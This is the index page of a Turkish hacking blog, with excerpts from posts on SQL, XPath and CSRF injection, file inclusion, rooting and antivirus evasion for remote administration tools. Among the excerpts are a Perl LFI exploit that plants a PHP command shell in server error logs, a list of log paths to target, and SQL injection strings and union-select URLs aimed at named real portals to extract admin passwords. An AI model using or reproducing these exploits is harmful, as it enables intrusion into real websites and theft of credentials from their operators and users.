OverFlows 101
Memory lere yapacağımız saldırılarda belirgin konsept daha önceden tanımlanmış adres boşlukları olacak. Programlama bilen lerin bildiği üzere programlama dillerinde öncelikle bufferlar açılır hafızada. Bu dökümanlarda...
Cookie Modifying, Poisioning zayıflığı
Günümüzdeki bazı php sistemlerde şifre kullanımı tehlikeli olduğu için çok daha zayıf ve sömürüye açık olan cookie kontrol sistemleri eklendi!. Sistem şu şekilde işliyor :1-Admin...
Uzaktan Yönetim Programlarının Virus Tarayıcıdan Kaçırılması
Bu dökümanda sizlere Uzaktan Yönetim programlarının nasıl Anti-Virüs programlarından kaçırılacağı anlatacağım. Daha fazla olduğuna eminim ama bu dökümanda 4 tanesinden bahsedeceğim. 1. Encryptors/Compressors:...
Perl'le Yazılmış Programlar Kullanan ScriptKiddieleri Durdur
Perl gibi satır komutlu işlemlere dayanan son derece basit bi şekilde öğrenilip zarar vermek amaçlı aktif bir şekilde kullanılabilen perl exploit'ler...
Linux Kernel için vmsplice patch
— a/fs/splice.c +++ b/fs/splice.c @@ -1179,6 +1179,9 @@ static int copy_from_user_mmap_sem(void *dst, const void __user *src, size_t n) { ...
CSRF saldırıları ve CSRF zayıflıklarını kapatmak
CSRF nedir ?Kısaca anlatalım CSRF Cross-site request forgery anlamına gelir.Direk hacking yöntemi olmamakla - olamakla beraber sosyal mühendislikyöntemleriyle çok etkili sonuçlar vermektedir.Yöntemin mantığını size anlatıyım....
Sql Injection Permission Bypass 1
Sql injectionda şimdiye kadar hep ' kullanarak hata aldık.Bazı güvenlikçiler ' ı yasaklayabiliyorlar.Bizi bağlarmı ? bağlamaz.Farklı bi sql fonksiyonuyla halledeceğiz CONCAT() ve CHAR()Klasik sql saldırı...
Magic URL ve Gizli Form Güvenlik Açıkları
Selam ben blackened bu dökümanda sizlere Magic URL ve Gizli Formlardan bahsedeceğim Amaç=Bu sefer amacımız sert bir saldırı...
Rooting 101
Rooting nedir?Rooting ,root=en yetkili kişi rooting=serverda yetkili hale gelmek...Yeterince açık sanırım başka açıklamaya gerek yok.Yöntemlere ve nerde kullanıldığına geçelim.Rooting az yetkili olduğumuz yerde çok yetkili...
Log Locations
Bunlar LFİ için log yerleri rfi kodu geçirip rfi yapacaklarınız anlatmıştım hatırlayan sorabilir IRIX: ================= /var/adm/SYSLOG /var/adm/sulog /var/adm/utmp ...
Sql Injection Tablo Adı Bulmak
Selam ben blackened bu dökümanda sizlere asp sistemli veritabanlarında tablo adı bulmayı örnekli olarak ,en detaylı bi şekilde anlatmaya çalışacağım.Daha önceki yazılarda anlattığım gibi...
XPath Injection 101
XML database'larda bypass için veya tabiki veri almak için kullanılan yöntemdir.AG’s Tamino, Apache Software Foundation XIndice, Sleepycat Software Berkeley DbXML, dbXML Group dbXML,An gibi...
LFI Perl Exploit
#!/usr/bin/perl -wuse IO::Socket;use LWP::UserAgent;$site="victim.com";$path="/folder/";$code="<? passthru($_GET[cmd]) ?>";$log = "../../../../../../../etc/httpd/logs/error_log";print "Trying to inject the code";$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die " Connection Failed. ";print $socket "GET ".$path.$code." HTTP/1.1 ";print...
Local File İnclusion Saldırı Teknikleri 1
Remote file inclusion u duymuştunuz dışardan code (shell) çağırarak siteye saldırıda bulunuyorduk.Fakat local file inclusion da olay farklı bu sefer serverin içinde...
Php de kayıt olurken admin yetkisi almak (basic)
Hemen hemen her portalda kayıt bölümleri vardır.Bu bölümlerde update komutu kullanılır.Biraz düşünürseniz aslında update komutu kullanan baya yer vardır.ÖrneğinUPDATE kullanicilar SET Name='$kullaniciadi' WHERE ID=1;Burda name...
RFİ - Fİ Açıklarından Kurtulmak
Php kodlayanların son zamanlarda yaptığı en büyük hatalar url çeken veya yönlenen sayfalara include ederken değişken sayfa ($page) kullanmak bunun sonucu remote file inclusion...
Php mysql İnjection'da Table ve Column Adı Bulmak 1
Php mysql injectionda tablolar ve columnlar information_schema dosyasında bulunur bunları almak için bir önceki dökümanda anlattığım gibi ?id=-1 gibi linklerde inject ederek kullanabiliriz.information_schema.tables bize tablo...
BLACKENEDSECURİTY BLOGUNA HOŞ GELDİNİZ
blackenedsecurity bloguna hoş geldiniz bu siteden alacağınız bilgiler güvenlik amaçlıdır kullanımınız sonucu doğabilecek sorunlardan sorumlu değilim birde lütfen alıntı yaparken kaynak gösteriniz. yorum yapmak serbesttir...
Php'de Sql İnjection Teknikleri 1
$username = $_POST['username']; query = "SELECT * FROM users WHERE username='" . sql_quote($username) . "'";burda gördüğünüz temiz ve çok basit bir php kodu ve...
Buglarım 3 (EBOSWEB dershane portalı Sql Bypass)
Ebosweb dershane portalında 2 tür açık (http://blackenedsecurity.blogcu.com) buldum 1.si öğrenci girişinde bypass açığı var(yani şifresiz erişim)exploit: boş alanlara 'or' '=' girerizörnek site : http://www.ebos.com.tr/EbosWeb/ASP/form1.aspEbosweb dershane...
Buglarım 2 (TEKMAN PORTAL 2.0 ve Bütün Versiyonlar)
Tekmanx Portalı 2.0 ve Diğer Versiyonlarında Sql İnjection AçığıTekmanx portal 2.0 ı daha vermemişler (http://blackenedsecurity.blogcu.com) ama eski versiyonlarının kaynak kodları var http://www.tekmanx.net/dowlayt_cat.asp?iCat=100exploit:http://www.tekmanx.net/list.asp?Cat_id=42%20union%20select+0,0,sifre,2,3,4,5+from%20yonet83470205b9eefee6749cd4313ca97520 ...
Buglarım 1 (Turuncu Portal 1.1 ve Bütün Versiyonlar)
Turuncu portal 1,1 ve bütün versiyonlarıTuruncu portalın bir önceki versiyonunun haber bölümünde bir sql injection açığı vardı.Yeni versiyonunda bu açığı kapatmıslar ama bu (http://blackenedsecurity.blogcu.com/)üyelerin ulaşabildiği...
